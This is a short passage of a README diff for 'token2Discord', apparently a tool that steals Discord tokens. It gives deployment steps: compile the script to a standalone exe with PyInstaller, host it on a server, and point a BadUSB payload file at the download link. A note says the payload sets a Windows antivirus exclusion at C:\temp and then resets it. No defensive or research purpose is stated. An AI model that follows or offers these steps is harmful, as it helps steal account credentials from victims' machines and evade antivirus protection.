CharlesTheGreat77/token2Discord/README.md

 python3 -m PyInstaller token2Discord.py --onefile
 ```
 * After compiling:
   - Inside the /dist directory is your exe file

-# Upload
 * Upload exe to a server, local python server, etc... do as you will.

-# BADUSB
-* Edit the line "LINK_TO_EXE" in the token2Discord.txt to the link to your newly created exe file.

 # Key note
 * this is not made to bypass AV, but rather sets an exclusion at C:\temp, then resets such